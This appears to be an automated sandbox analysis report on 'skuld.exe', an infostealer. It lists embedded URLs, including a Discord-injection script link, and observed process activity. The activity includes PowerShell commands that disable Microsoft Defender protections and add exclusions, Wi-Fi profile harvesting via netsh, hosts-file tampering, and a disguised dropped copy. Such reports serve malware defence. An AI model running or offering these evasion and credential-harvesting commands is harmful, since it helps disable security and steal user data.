Source: skuld.exe, SecurityHealthSystray.exe.0.dr | String found in binary or memory: https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpgJSON
Source: skuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://images-ext-1.discordapp.net/external/w7GYH8eczcCraeHx2lLq9j1gTDZzM2VBw5ALhQdbZvY/%3Fv%3D4/ht
Source: skuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://media.discordapp.net/attachments/1348329531148079104/1349316345950503014/Display_1.png?ex=67
Source: powershell.exe, 0000000D.00000002.1724018024.000001CAEF230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1724018024.000001CAEF371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1594297796.000001CAE0B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: skuld.exe, 00000000.00000002.2728804738.000000C00011A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&se
Source: powershell.exe, 0000000D.00000002.1594297796.000001CAE0929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000D.00000002.1594297796.000001CAE0929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgXX
Source: skuld.exe, SecurityHealthSystray.exe.0.dr | String found in binary or memory: https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.jsrange
Source: skuld.exe, 00000000.00000003.1505649408.000000C000C7A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org
Source: skuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: skuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.BoEX37k-iQhx
Source: skuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://weibo.com/
Source: skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/
Source: skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.baidu.com/
Source: skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.ebay.co.uk/
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                        Source: skuld.exe, 00000000.00000003.1505649408.000000C000C7A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                        Source: skuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bKxBjSHff0w5
                        Source: skuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.0qLVhD3otCFX
                        Source: skuld.exe, 00000000.00000002.2753158867.0000027D65247000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                        Source: skuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: skuld.exe, 00000000.00000002.2753158867.0000027D65247000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        Source: Yara match | File source: skuld.exe, type: SAMPLE
                        Source: Yara match | File source: Process Memory Space: skuld.exe PID: 7148, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        Source: C:\Users\user\Desktop\skuld.exe | File written: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\Desktop\skuld.exe | Process Stats: CPU usage > 24%
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: Commandline size = 3614
                        Source: classification engine | Classification label: mal100.troj.adwa.spyw.expl.evad.winEXE@34/24@5/5
                        Source: C:\Users\user\Desktop\skuld.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                        Source: C:\Users\user\Desktop\skuld.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\3575651c-bb47-448e-a514-22865732bbc
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
                        Source: C:\Users\user\Desktop\skuld.exe | File created: C:\Users\user\AppData\Local\Temp\commonfiles-temp
                        Source: skuld.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
                        Source: C:\Users\user\Desktop\skuld.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Users\user\Desktop\skuld.exe | File read: C:\Windows\System32\drivers\etc\hosts
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, SecurityHealthSystray.exe.0.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, SecurityHealthSystray.exe.0.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, SecurityHealthSystray.exe.0.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: skuld.exe, 00000000.00000002.2747898604.0000027D63A70000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2746123468.0000027D63583000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, SecurityHealthSystray.exe.0.dr | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: skuld.exe | Virustotal: Detection: 24%
                        Source: skuld.exeString found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandoneduse of closed network connection: day-of-year does not match dayNtWow64QueryInformationProcess64go package net: hostLookupOrder(invalid VaList argument type: %Tcrypto/aes: input not full blockcrypto/cipher: counter decreased" not supported for cpu option "chacha20poly1305: bad key lengthtls: unknown Renegotiation valuetls: NextProtos values too largetls13: label or context too longmime: expected token after slashinitial table capacity too largeunexpected character, want colonsubtle.XORBytes: invalid overlapecdsa: internal error: r is zeroecdsa: internal error: s is zeroed25519: bad public key length: crypto/rsa: public key missing Nx509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failuremlkem: invalid ciphertext lengthcrypto/ecdh: invalid private keyinput overflows the modulus sizechacha20: invalid buffer overlap-DisableIntrusionPreventionSystemAppData\Roaming\Waterfox\ProfilesAppData\Roaming\K-Meleon\ProfilesAppData\Local\DCBrowser\User Data^(D|A|9)[a-km-zA-HJ-NP-Z1-9]{33}$[Join Server](https://discord.gg/release of handle with refcount 0too many levels of symbolic linksInitializeProcThreadAttributeListbytes.Buffer.Grow: negative countinsufficient memory for aggregatecrypto/des: output not full blockindefinite length found (not DER)struct contains unexported fieldsfailed to alloc global memory: %wpseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolinvalid header field value for %qpad size larger than data 
payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %q142108547152020037174224853515625710542735760100185871124267578125CryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWreflect: slice index out of range of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length sync: RUnlock of unlocked RWMutexskip everything and stop the walkslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert run
                        Source: skuld.exe | String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
                        Source: C:\Users\user\Desktop\skuld.exe | File read: C:\Users\user\Desktop\skuld.exe
                        Source: unknown | Process created: C:\Users\user\Desktop\skuld.exe "C:\Users\user\Desktop\skuld.exe"
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\Desktop\skuld.exe
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline"
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9F3.tmp" "c:\Users\user\AppData\Local\Temp\dh1o0wbe\CSC88D051478A0408BB4BF8545E397BDC4.TMP"
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: powrprof.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: umpdc.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: textshaping.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: iphlpapi.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: dhcpcsvc.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: dnsapi.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: mswsock.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: textinputframework.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: coreuicomponents.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: coremessaging.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: ntmarta.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: rasadhlp.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\skuld.exe | Section loaded: dpapi.dll
                        Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
                        Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
